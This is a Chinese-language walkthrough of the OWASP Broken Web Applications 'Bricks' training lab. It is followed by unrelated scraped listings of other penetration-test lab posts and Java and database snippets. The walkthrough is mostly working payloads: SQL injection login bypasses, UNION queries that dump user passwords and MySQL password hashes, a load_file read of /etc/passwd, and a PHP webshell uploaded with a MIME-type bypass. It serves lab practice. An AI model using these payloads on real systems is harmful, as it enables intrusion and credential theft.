zhaji001

owaspbwa之Bricks

简介

下载：https://sourceforge.net/projects/owaspbwa/files/

GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide

0x001 login #1

burp拦截修改提交检查注入

username=test'&passwd=test'&submit=Submit



#SQL Query: SELECT * FROM users WHERE name='test'' and password='test''

burp拦截修改提交绕过登录

username=test' or 1=1-- -&passwd=test&submit=Submit

0x002 Login #2

和login1一样绕过登录

username=test' or 1=1-- -&passwd=test&submit=Submit

0x003 Login #3

username=test&passwd=test') or 1=1-- -&submit=Submit

0x004 Login #4

#4 #5 #6 同上注入绕过

0x005 Upload #1

上传webshell.php 根据文件路径http://192.168.1.105/owaspbricks/upload-1/uploads/shell.php?cmd=%20id

cat shell.php

0x006 Upload #2

burp拦截修改 MIME类型绕过上传

Upgrade-Insecure-Requests: 1

-----------------------------85910206920936513261896987994
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: application/x-php #修改为 image/png


-----------------------------85910206920936513261896987994
Content-Disposition: form-data; name="upload"

Upload
-----------------------------85910206920936513261896987994--

0x007 Upload #3

同上绕过

Upgrade-Insecure-Requests: 1

-----------------------------111736740519479867541731542773
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/png


-----------------------------111736740519479867541731542773
Content-Disposition: form-data; name="upload"

Upload
-----------------------------111736740519479867541731542773--

0x008 Content #1

猜数据库列

#URL
id=0 order by 1
id=0 order by 2
id=0 order by 3
id=0 order by 4
id=0 order by 5
id=0 order by 6
id=0 order by 7
id=0 order by 8
id=0 order by 9 #数据库返回错误信息 可知道8列

获取数据库版本，用户，数据库名

id=0 and 1=2 union select version(),user(),database(),4,5,6,7,8

获取主机名和数据库db文件位置

id=0 and 1=2 union select @@hostname,@@datadir,3,4,5,6,7,8

查询数据库db

id=0 and 1=2 union select group_concat(schema_name),2,3,4,5,6,7,8 from information_schema.schemata

查询数据库表

id=0 and 1=2 union select group_concat(table_name),2,3,4,5,6,7,8 from information_schema.tables where table_schema=database()

指定查询库中的表

id=0 and 1=2 union select group_concat(table_name),2,3,4,5,6,7,8 from information_schema.tables where table_schema=bricks

指定查询库列名

id=0 and 1=2 union select group_concat(column_name),2,3,4,5,6,7,8 from information_schema.columns where table_schema='bricks' and table_name='users'

查询用户名和密码

id=0 and 1=2 union select group_concat(name),group_concat(password),3,4,5,6,7,8 from users

查询mysql用户

id=0 and 1=2 union select group_concat(user),2,3,4,5,6,7,8 from mysql.user

查询用户的哈希密码

id=0 and 1=2 union select group_concat(host), group_concat(user),group_concat(Password),3,4,5,6,7,8 from mysql.user

查询当前用户哈希密码

id=0 and 1=2 union select User(),password,3,4,5,6,7,8 from mysql.user

读取/etc/passwd文件

id=0 and 1=2 union select load_file(0x2f6574632f706173737764),2,3,4,5,6,7,8 from mysql.user

0x009 Content #2

注释检测

user=harry' and 2=1-- -
user=harry' and 1=1-- -

查询数据库版本

user=harry' and 1=2 union select @@version,2,3,4,5,6,7,8-- -

查询用户名密码

user=harry' and 1=2 union select group_concat(name),group_concat(password),3,4,5,6,7,8 from users-- -

0x010 Content #3

注入检测 burp拦截修改提交

username=tom'&submit=Submit

用户名信息检测

username=tom' and 1=1-- -&submit=Submit

查询数据库版本

username=tom' and 1=0 union select @@version,2,3,4,5,6,7,8-- -&submit=Submit

0x011 Content #4

User-Agent SQL注入

GET /owaspbricks/content-4/ HTTP/1.1
Host: 192.168.1.105
User-Agent: test' #拦截修改
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: ' or 1=1-- -

User-Agent: ' and 1=0 union select @@version,2,3,4,5,6,7,8-- -

0x012 Content #5

根据之前找的用户信息进行利用

GET /owaspbricks/content-5/index.php HTTP/1.1
Host: 192.168.1.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.105/owaspbricks/content-5/index.php
Cookie: User=tom'; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=5aoprhloiptnvucuqigfatete6
Connection: close
Upgrade-Insecure-Requests: 1

Cookie: User=tom' and 1=1-- -; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=5aoprhloiptnvucuqigfatete6

tom' and 1=0 union select @@version,2,3,4,5,6,7,8-- -;

0x012 Content #6

查看URL有个302的重定向而且URL末尾的值是Base64编码

对sql进行Base64编码

3 and 1=0 union select @@version,2,3,4,5,6,7,8-- -

id=MyBhbmQgMT0wIHVuaW9uIHNlbGVjdCBAQHZlcnNpb24sMiwzLDQsNSw2LDcsOC0tIC0=

你可能感兴趣的:(靶机练习)

CISP-PTE考试通关经验 Python_chichi 互联网职业发展科技 android
考试题型考试题型氛围选择题（20分）+基础题（50分）+综合题（三个key30分），70分以上通过，也就是选择题保证10分以上，基础题全做出来的话，至少要做出综合题第一道小题。一、选择题主要考察基础知识，前四天老师都有讲，另外还发了一些题库，看一遍的话，基本考10分以上问题不大。二、基础题1.sql注入第一题sql注入是一个文章发表系统，培训的时候靶机练习有做过，但是不太一样，注册用户登录之后，注
Gaara靶机练习郑居中3.0 Gaara靶机 gdb提权
渗透测试一.信息收集1.确定IP地址2.nmap扫描3.目录扫描二.hydra爆破1.ssh连接2.信息探索三.提权gdb提权提权一.信息收集1.确定IP地址┌──(root㉿kali)-[~/kali/web]└─#arp-scan-lInterface:eth0,type:EN10MB,MAC:00:0c:29:10:3c:9b,IPv4:192.168.9.10Startingarp-sca
Neos的渗透测试靶机练习——DarkHole-2 Dr.Neos 靶场练习渗透测试网络安全 sql git 服务器
DarkHole-2一、实验环境二、开始渗透1.搜集信息2.git文件泄露3.SQL注入4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DarkHole-2（网卡初始为仅主机模式，要有安全意识）靶机网卡有问题需要提前修改，进入系统前先按shift，然后按e进入编辑模式，将ro至initrd之前的内容修改为rwsing
Neos的渗透测试靶机练习——DarkHole-1 Dr.Neos 靶场练习网络安全渗透测试网络安全 web安全
DarkHole-1一、实验环境二、开始渗透1.搜集信息2.sql注入4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DarkHole-1（网卡初始为仅主机模式，要有安全意识）靶机网卡有问题需要提前修改，进入系统前先按shift，然后按e进入编辑模式，将ro至initrd之前的内容修改为rwsingleinit=/b
Neos的渗透测试靶机练习——DC-8 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
DC-8一、实验环境二、开始渗透1.搜集信息2.sql注入（1）测试注入点（4）sqlmap3.PHP上传，反弹shell4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-8（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身i
Neos的渗透测试靶机练习——DC-9 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
DC-9一、实验环境二、开始渗透1.搜集信息2.sql注入3.文件包含漏洞4.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-9（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.16
Neos的渗透测试靶机练习——DC-7 Dr.Neos 靶场练习网络安全渗透测试网络安全 web安全
DC-7一、实验环境二、开始渗透1.搜集信息2.文件上传3.提权三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-7（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.168.56.101。
Neos的渗透测试靶机练习——DC-5 Dr.Neos 靶场练习安全渗透测试网络安全 web安全网络
DC-5一、实验环境二、开始渗透1.搜集信息2.文件包含漏洞3.反弹shell三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-5（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.168.
Neos的渗透测试靶机练习——Wakanda Dr.Neos 靶场练习安全渗透测试网络安全 web安全
Wakanda一、实验环境二、开始渗透（根据流程学习思路）1.获知本机IP、靶机IP2.靶机端口、协议、前端信息（Nmap）3.进入后台，查看敏感数据三、总结一、实验环境虚拟机软件：VirtualBox攻击机：KaliLinux（仅主机模式）靶机：Wakanda（仅主机模式，共有3个flag）二、开始渗透（根据流程学习思路）1.获知本机IP、靶机IP切换到root用户（输入sudosu及对应的密码
Neos的渗透测试靶机练习——DC-3 Dr.Neos 靶场练习网络安全渗透测试网络安全 web安全
DC-3一、实验环境二、开始渗透1.搜集信息2.sqlmap3.上传PHP木马三、总结一、实验环境虚拟机软件：VirtualBox攻击机：kalilinux（网卡初始为仅主机模式，要有安全意识）靶机：DC-3（网卡初始为仅主机模式，要有安全意识）二、开始渗透1.搜集信息输入sudosu，将kali切换到root权限；输入ifconfig查询自身ip，即攻击机ip；可以看到自身ip为192.168.
渗透测试-靶机DC-2-知识点总结 Dr.Neos 靶机-知识点总结安全渗透测试网络安全 web安全网络
靶机DC-2-知识点总结一、前言二、实验环境三、渗透测试工具1.cewl（1）cewl简介（2）cewl常见用法2.wpscan（1）wpscan简介（2）wpscan常见用法直接扫描-eu爆破用户名-U、-P爆破账户密码3.dirb（1）dirb简介（2）dirb常见用法四、渗透测试技巧1.rbash逃逸2.git提权五、总结一、前言本次渗透测试具体流程详见Neos的渗透测试靶机练习——DC-2
hackmyvm Rei靶机练习活着Viva hackmyvm 渗透测试
主机发现端口扫描漏洞挖掘权限提升主机发现攻击机ip靶机ip-sn发送arp请求包探测目标ip是否在线端口扫描-p-所有端口扫描-sV查询开放端口的服务这里65333是ssh服务，63777是http服务最好拿个记事本记住漏洞挖掘浏览靶机的默认页面，查查有什么漏洞它说indexp.txt在web的默认目录，那我访问一下。indexp.txt下显示了哪些目录可以访问，哪些目录不可以访问，类似于robo
vulnhub靶机练习-Os-hackNos Asson
0x01靶机简介Difficulty:EasytoIntermediateFlag:2FlagfirstuserAndsecondrootLearning:exploit|WebApplication|Enumeration|PrivilegeEscalationWebsite:www.hackNos.commail:[email protected]靶机下载https://www.vulnh
Linux靶机练习小小西贝 Linux Web安全靶机练习安全网络安全 linux
文章目录第1次Lampiao1.信息收集1.1netdiscover扫描1.2namp扫描第1次扫描第2次扫描1.3御剑扫描打开扫描到的文件打开登录网站sql注入链接跳转node/1node/3node/22.漏洞探测2.1利用cewl获取网站信息2.2ssh进行登录查看靶机信息：3.提权3.1利用脏牛提权3.2对40847文件的操作3.3tiago用户下载40847.cpp文件3.4获取root
靶机练习2之利用Linux版本内核漏洞实现本地权限提升 yuan_boss 保护国家网络安全 linux ubuntu 靶机本地权限提升漏洞 kali
文章目录信息收集1.扫描网段2.扫描敏感目录渗透阶段密码爆破查看主机内核查找版本漏洞查看漏洞详细信息拷贝漏洞到本地将漏洞文件传到靶机漏洞利用信息收集1.扫描网段建议开启两个终端，首尾扫描，提高速度与准确性从0开始扫描nmap10.9.136.0/24从后面开始扫描nmap-r10.9.136.0/24扫描完成后，发现有个主机10.9.136.231开放了80端口，直接访问该主机，发现只有一个图片，
Vulnhub-Raven1 靶机练习 GloryGod Vulnhub 网络安全网络安全
靶机地址：Raven:1~VulnHub1.基本信息Kali：192.168.26.131靶机：192.168.26.1362.信息收集arp-scan-l或者nmap-sn192.168.26.0/24之后进行全端口扫描，保证自己的隐蔽性（假设真实环境）nmap-sT--min-rate10000-p-192.168.26.136-oA./nmap_report/raven1/port紧接着进行
靶机练习 No.23 Vulnhub靶机DarkHole 2 .git信息泄露 .bash_history历史命令提权 LuckyCharm~ 靶机学习安全
靶机练习No.23Vulnhub靶机DarkHole20x00环境准备0x01信息收集步骤一：ip探测步骤二：端口扫描0x02漏洞挖掘思路一：web漏洞挖掘（.git信息收集）思路二：22ssh爆破步骤一：githack.py收集.git步骤二：从git仓库审查代码及数据库文件（1）config/config.php（2）审计index.phplogin.phpdashboard.php步骤三：g
【靶机练习】Vulnhub靶场Earth-练习记录小白帽的成长网络安全渗透测试 linux 服务器 centos
注：靶机开机前需要在虚拟机设置关闭USB，否则靶机无法打开信息收集攻击机IP：192.168.43.118主机发现：sudonmap-sP192.168.43.1/24确认目标机IP：192.168.43.241端口扫描：sudonmap-sC-sV-p-192.168.43.241扫描结果：目标机开了22端口和80端口，80端口中配置了两个DNS，需要修改hosts文件指定IP。没修改hosts
SQL注入靶机练习：BUU SQL COURSE 1 燕麦葡萄干渗透测试学习渗透测试 SQL注入 BUUCTF
SQL注入靶机练习：BUUSQLCOURSE1一、SQL注入知识点二、前置知识三、SQL注入测试的一般步骤四、解题过程一、SQL注入知识点可参考SQL注入详解二、前置知识参考来源：渗透攻防Web篇-深入浅出SQL注入mysql5.0以上版本中存在一个重要的系统数据库information_schema，通过此数据库可访问mysql中存在的数据库名、表名、字段名等元数据。information_sc
Vulnhub靶场-DC-1靶机练习 .风溪. DC靶机
Vulnhub-DC-1daoyuan##零、环境配置1、虚拟机：vmware15.5.62、攻击环境：kalilinux2020.3192.168.143.1283、靶机：DC-1靶机直接从虚拟机wmware中打开，注意将网络适配器改为nat模式。一、攻击过程一、主机存活扫描arp-scan-l探测到目标ip:192.168.143.134二、端口扫描namp-A-p-192.168.143.1
Vulnhub靶场-DC-2靶机练习 .风溪. DC靶机
Vulnhub-DC-2daoyuan零、环境配置1、虚拟机：vmware15.5.62、攻击环境：kalilinux2020.3192.168.143.1283、靶机：DC-2靶机直接从虚拟机wmware中打开，注意将网络适配器改为nat模式。一、信息收集1、主机存活扫描arp-scan-l2、端口扫描nmap-A-p-192.168.143.135发现开放的端口以及服务80wordpress7
JIS-CTF: VulnUpload 靶机练习 yemansleep
1.靶机介绍VM名称：JIS-CTF：VulnUpload难度：初学者说明：此机器上有五个标志。试着找到它们。平均需要1.5小时才能找到所有旗帜。2.信息收集2.1对靶机进行端口扫描，发现只有80，22端口开放image.png2.2查看网站的robots.txt发现有如下目录User-agent:*Disallow:/Disallow:/backupDisallow:/adminDisallow
做一个靶机练习_djinn 五行缺金 golang
前几天一直在背资料，背的很烦，找个靶机来玩玩.第一件事，先找一下主机地址，由于我在自己的局域网内，我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话，可以用nmap检测一下,sS是指用半开放式扫描，不会完成三次握手，速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
做一个靶机练习_djinn 五行缺金 golang
前几天一直在背资料，背的很烦，找个靶机来玩玩.第一件事，先找一下主机地址，由于我在自己的局域网内，我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话，可以用nmap检测一下,sS是指用半开放式扫描，不会完成三次握手，速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
渗透测试靶机练习（一）之lazysysadmin 不断积淀渗透测试
lzaysysadmin情报搜集主机发现，使用netdiscover主机扫描，使用nmap使用dirbuster进行网站目录扫描可以看到扫描结果，有workpress和phpmyadmin登录网站，查看robots.txt文件存在目录遍历漏洞，但是没有发现可用信息可以尝试爆破一下phpmyadmin的登录口令和wpscan扫描一下主机扫描中发现445端口共享文件发现三个共享的文件夹Linux下挂载
DC-5靶机练习水中煮鱼冒气靶机练习
DC-5靶机练习文件下载链接第一部分信息收集第一步信息收集第二步扫描开放的端口第三步访问80端口[打开Contact页面，发现是一个留言板块，在留言板块输入内容并提交]第四步：观察网页第二部分文件包含漏洞第一步：使用BurpSuite抓包，爆破后台页面[发现存在index.php，solutions.php，about-us.php，faq.php，contact.php，thankyou.php
靶机练习 - ATT&CK红队实战靶场 - 1. 环境搭建和漏洞利用 Sally_Zhang
最近某个公众号介绍了网上的一套环境，这个环境是多个Windows靶机组成的，涉及到内网渗透，正好Windows和内网渗透一直没怎么接触过，所以拿来学习下。下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境配置和检查加上kali一共四台虚拟机。win7x64需要配置两张网卡，一个在内网网段，一个在外网网段，配置如下(VM默认只有一张网卡，
Pikachu 通关笔记 BROTHERYY 靶场练习
Pikachu靶机练习1、暴力破解1.1基于表单的暴力破解1.2验证码绕过(onserver)1.3验证码绕过(onclient)1.4验证码绕过(token防爆破)2、Cross-SiteScripting-XSS2.1反射型(get)2.2反射型(post)2.3存储型xss2.4DOM型xss2.5DOM型xss-x2.6XSS之盲打2.7XSS之过滤2.8xss之htmlspecialch
DC-1入门练习 Mr H
**渗透测试入门靶机练习DC-1**大家好！第一次搭建自己的博客，对这个环境有点陌生，作为一名网络安全学习者很高兴为大家提供一些踩坑经验以及学习教程如有不足，或错误还请大家指点。#环境搭建1.首先准备好DC-1靶机，其实就是一个虚拟机ova文件下载地址：https://download.vulnhub.com/dc/DC-1.zip其他DC靶机地址只需修改上面DC-后面数字即可2.打开次虚拟机创建
LazySysAdmin 渗透靶机练习林家大公子渗透学习
下载链接：https://www.vulnhub.com/entry/lazysysadmin-1,205/扫描目标主机...省略输出有用的信息包括：http://x.x.x.x/phpmyadmin/http://x.x.x.x/wordpress/wp-adminhttp://x.x.x.x/wordpress/找到疑似用户名的：togie使用enum4linuxx.x.x.x，查找有用信息。
关于旗正规则引擎下载页面需要弹窗保存到本地目录的问题何必如此 jsp 超链接文件下载窗口
生成下载页面是需要选择“录入提交页面”，生成之后默认的下载页面<a>标签超链接为：<a href="<%=root_stimage%>stimage/image.jsp?filename=<%=strfile234%>&attachname=<%=java.net.URLEncoder.encode(file234filesourc
【Spark九十八】Standalone Cluster Mode下的资源调度源代码分析 bit1129 cluster
在分析源代码之前，首先对Standalone Cluster Mode的资源调度有一个基本的认识：首先，运行一个Application需要Driver进程和一组Executor进程。在Standalone Cluster Mode下，Driver和Executor都是在Master的监护下给Worker发消息创建(Driver进程和Executor进程都需要分配内存和CPU，这就需要Maste
linux上独立安装部署spark daizj linux 安装 spark 1.4 部署
下面讲一下linux上安装spark，以 Standalone Mode 安装 1）首先安装JDK 下载JDK：jdk-7u79-linux-x64.tar.gz ，版本是1.7以上都行，解压 tar -zxvf jdk-7u79-linux-x64.tar.gz 然后配置 ~/.bashrc&nb
Java 字节码之解析一周凡杨 java 字节码 javap
一： Java 字节代码的组织形式类文件 { OxCAFEBABE ，小版本号，大版本号，常量池大小，常量池数组，访问控制标记，当前类信息，父类信息，实现的接口个数，实现的接口信息数组，域个数，域信息数组，方法个数，方法信息数组，属性个数，属性信息数组 } &nbs
java各种小工具代码 g21121 java
1.数组转换成List import java.util.Arrays; Arrays.asList(Object[] obj); 2.判断一个String型是否有值 import org.springframework.util.StringUtils; if (StringUtils.hasText(str)) 3.判断一个List是否有值 import org.spring
加快FineReport报表设计的几个心得体会老A不折腾 finereport
一、从远程服务器大批量取数进行表样设计时，最好按“列顺序”取一个“空的SQL语句”，这样可提高设计速度。否则每次设计时模板均要从远程读取数据，速度相当慢！！二、找一个富文本编辑软件（如NOTEPAD+）编辑SQL语句，这样会很好地检查语法。有时候带参数较多检查语法复杂时，结合FineReport中生成的日志，再找一个第三方数据库访问软件（如PL/SQL）进行数据检索，可以很快定位语法错误。
mysql linux启动与停止墙头上一根草
如何启动/停止/重启MySQL一、启动方式1、使用 service 启动：service mysqld start2、使用 mysqld 脚本启动：/etc/inint.d/mysqld start3、使用 safe_mysqld 启动：safe_mysqld&二、停止1、使用 service 启动：service mysqld stop2、使用 mysqld 脚本启动：/etc/inin
Spring中事务管理浅谈 aijuans spring 事务管理
Spring中事务管理浅谈 By Tony Jiang@2012-1-20 Spring中对事务的声明式管理拿一个XML举例 [html] view plain copy print ? <?xml version="1.0" encoding="UTF-8"?>&nb
php中隐形字符65279（utf-8的BOM头）问题 alxw4616
php中隐形字符65279（utf-8的BOM头）问题今天遇到一个问题. php输出JSON 前端在解析时发生问题:parsererror. 调试: 1.仔细对比字符串发现字符串拼写正确.怀疑是非打印字符的问题. 2.逐一将字符串还原为unicode编码. 发现在字符串头的位置出现了一个 65279的非打印字符.
调用对象是否需要传递对象(初学者一定要注意这个问题) 百合不是茶对象的传递与调用技巧
类和对象的简单的复习,在做项目的过程中有时候不知道怎样来调用类创建的对象,简单的几个类可以看清楚,一般在项目中创建十几个类往往就不知道怎么来看为了以后能够看清楚,现在来回顾一下类和对象的创建,对象的调用和传递(前面写过一篇) 类和对象的基础概念: JAVA中万事万物都是类类有字段(属性),方法,嵌套类和嵌套接
JDK1.5 AtomicLong实例 bijian1013 java thread java多线程 AtomicLong
JDK1.5 AtomicLong实例类 AtomicLong 可以用原子方式更新的 long 值。有关原子变量属性的描述，请参阅 java.util.concurrent.atomic 包规范。AtomicLong 可用在应用程序中（如以原子方式增加的序列号），并且不能用于替换 Long。但是，此类确实扩展了 Number，允许那些处理基于数字类的工具和实用工具进行统一访问。
自定义的RPC的Java实现 bijian1013 java rpc
网上看到纯java实现的RPC，很不错。 RPC的全名Remote Process Call，即远程过程调用。使用RPC，可以像使用本地的程序一样使用远程服务器上的程序。下面是一个简单的RPC 调用实例，从中可以看到RPC如何
【RPC框架Hessian一】Hessian RPC Hello World bit1129 Hello world
什么是Hessian The Hessian binary web service protocol makes web services usable without requiring a large framework, and without learning yet another alphabet soup of protocols. Because it is a binary p
【Spark九十五】Spark Shell操作Spark SQL bit1129 shell
在Spark Shell上，通过创建HiveContext可以直接进行Hive操作 1. 操作Hive中已存在的表 [hadoop@hadoop bin]$ ./spark-shell Spark assembly has been built with Hive, including Datanucleus jars on classpath Welcom
F5　往header加入客户端的ip ronin47
when HTTP_RESPONSE {if {[HTTP::is_redirect]}{ HTTP::header replace Location [string map {:port/ /} [HTTP::header value Location]]HTTP::header replace Lo
java-61-在数组中，数字减去它右边(注意是右边)的数字得到一个数对之差. 求所有数对之差的最大值。例如在数组{2, 4, 1, 16, 7, 5, bylijinnan java
思路来自： http://zhedahht.blog.163.com/blog/static/2541117420116135376632/ 写了个java版的 public class GreatestLeftRightDiff { /** * Q61.在数组中，数字减去它右边(注意是右边)的数字得到一个数对之差。 * 求所有数对之差的最大值。例如在数组
mongoDB 索引开窍的石头 mongoDB索引
在这一节中我们讲讲在mongo中如何创建索引得到当前查询的索引信息 db.user.find(_id:12).explain(); cursor: basicCoursor 指的是没有索引 &
[硬件和系统]迎峰度夏 comsci 系统
从这几天的气温来看，今年夏天的高温天气可能会维持在一个比较长的时间内所以，从现在开始准备渡过炎热的夏天。。。。每间房屋要有一个落地电风扇，一个空调(空调的功率和房间的面积有密切的关系) 坐的，躺的地方要有凉垫，床上要有凉席电脑的机箱
基于ThinkPHP开发的公司官网 cuiyadll 行业系统
后端基于ThinkPHP，前端基于jQuery和BootstrapCo.MZ 企业系统轻量级企业网站管理系统运行环境:PHP5.3+, MySQL5.0 系统预览系统下载：http://www.tecmz.com 预览地址：http://co.tecmz.com 各种设备自适应响应式的网站设计能够对用户产生友好度，并且对于
Transaction and redelivery in JMS (JMS的事务和失败消息重发机制) darrenzhu jms 事务承认 MQ acknowledge
JMS Message Delivery Reliability and Acknowledgement Patterns http://wso2.com/library/articles/2013/01/jms-message-delivery-reliability-acknowledgement-patterns/ Transaction and redelivery in
Centos添加硬盘完全教程 dcj3sjt126com linux centos hardware
Linux的硬盘识别: sda 表示第1块SCSI硬盘 hda 表示第1块IDE硬盘 scd0 表示第1个USB光驱一般使用“fdisk -l”命
yii2 restful web服务路由 dcj3sjt126com PHP yii2
路由随着资源和控制器类准备，您可以使用URL如 http://localhost/index.php?r=user/create访问资源，类似于你可以用正常的Web应用程序做法。在实践中，你通常要用美观的URL并采取有优势的HTTP动词。例如，请求POST /users意味着访问user/create动作。这可以很容易地通过配置urlManager应用程序组件来完成如下所示
MongoDB查询(4)——游标和分页[八] eksliang mongodb MongoDB游标 MongoDB深分页
转载请出自出处：http://eksliang.iteye.com/blog/2177567 一、游标数据库使用游标返回find的执行结果。客户端对游标的实现通常能够对最终结果进行有效控制，从shell中定义一个游标非常简单，就是将查询结果分配给一个变量（用var声明的变量就是局部变量），便创建了一个游标，如下所示： > var
Activity的四种启动模式和onNewIntent() gundumw100 android
Android中Activity启动模式详解　　在Android中每个界面都是一个Activity，切换界面操作其实是多个不同Activity之间的实例化操作。在Android中Activity的启动模式决定了Activity的启动运行方式。　　Android总Activity的启动模式分为四种： Activity启动模式设置： <acti
攻城狮送女友的CSS3生日蛋糕 ini html Web html5 css css3
在线预览：http://keleyi.com/keleyi/phtml/html5/29.htm 代码如下： <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>攻城狮送女友的CSS3生日蛋糕-柯乐义<
读源码学Servlet（1）GenericServlet 源码分析 jzinfo tomcat Web servlet 网络应用网络协议
Servlet API的核心就是javax.servlet.Servlet接口，所有的Servlet 类（抽象的或者自己写的）都必须实现这个接口。在Servlet接口中定义了5个方法，其中有3个方法是由Servlet 容器在Servlet的生命周期的不同阶段来调用的特定方法。先看javax.servlet.servlet接口源码： package
JAVA进阶：VO(DTO)与PO(DAO)之间的转换 snoopy7713 java VO Hibernate po
PO即 Persistence Object　　VO即 Value Object 　VO和PO的主要区别在于：　　VO是独立的Java Object。　　PO是由Hibernate纳入其实体容器（Entity Map）的对象，它代表了与数据库中某条记录对应的Hibernate实体，PO的变化在事务提交时将反应到实际数据库中。　实际上，这个VO被用作Data Transfer
mongodb group by date 聚合查询日期统计每天数据（信息量） qiaolevip 每天进步一点点学习永无止境 mongodb 纵观千象
/* 1 */ { "_id" : ObjectId("557ac1e2153c43c320393d9d"), "msgType" : "text", "sendTime" : ISODate("2015-06-12T11:26:26.000Z")
java之18天常用的类(一) Luob. Math Date System Runtime Rundom
System类 import java.util.Properties; /** * System: * out:标准输出,默认是控制台 * in:标准输入,默认是键盘 * * 描述系统的一些信息 * 获取系统的属性信息:Properties getProperties(); * * * */ public class Sy
maven wuai maven
1、安装maven：解压缩、添加M2_HOME、添加环境变量path 2、创建maven_home文件夹，创建项目mvn_ch01,在其下面建立src、pom.xml，在src下面简历main、test、main下面建立java文件夹 3、编写类，在java文件夹下面依照类的包逐层创建文件夹，将此类放入最后一级文件夹 4、进入mvn_ch01 4.1、mvn compile ,执行后会在

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他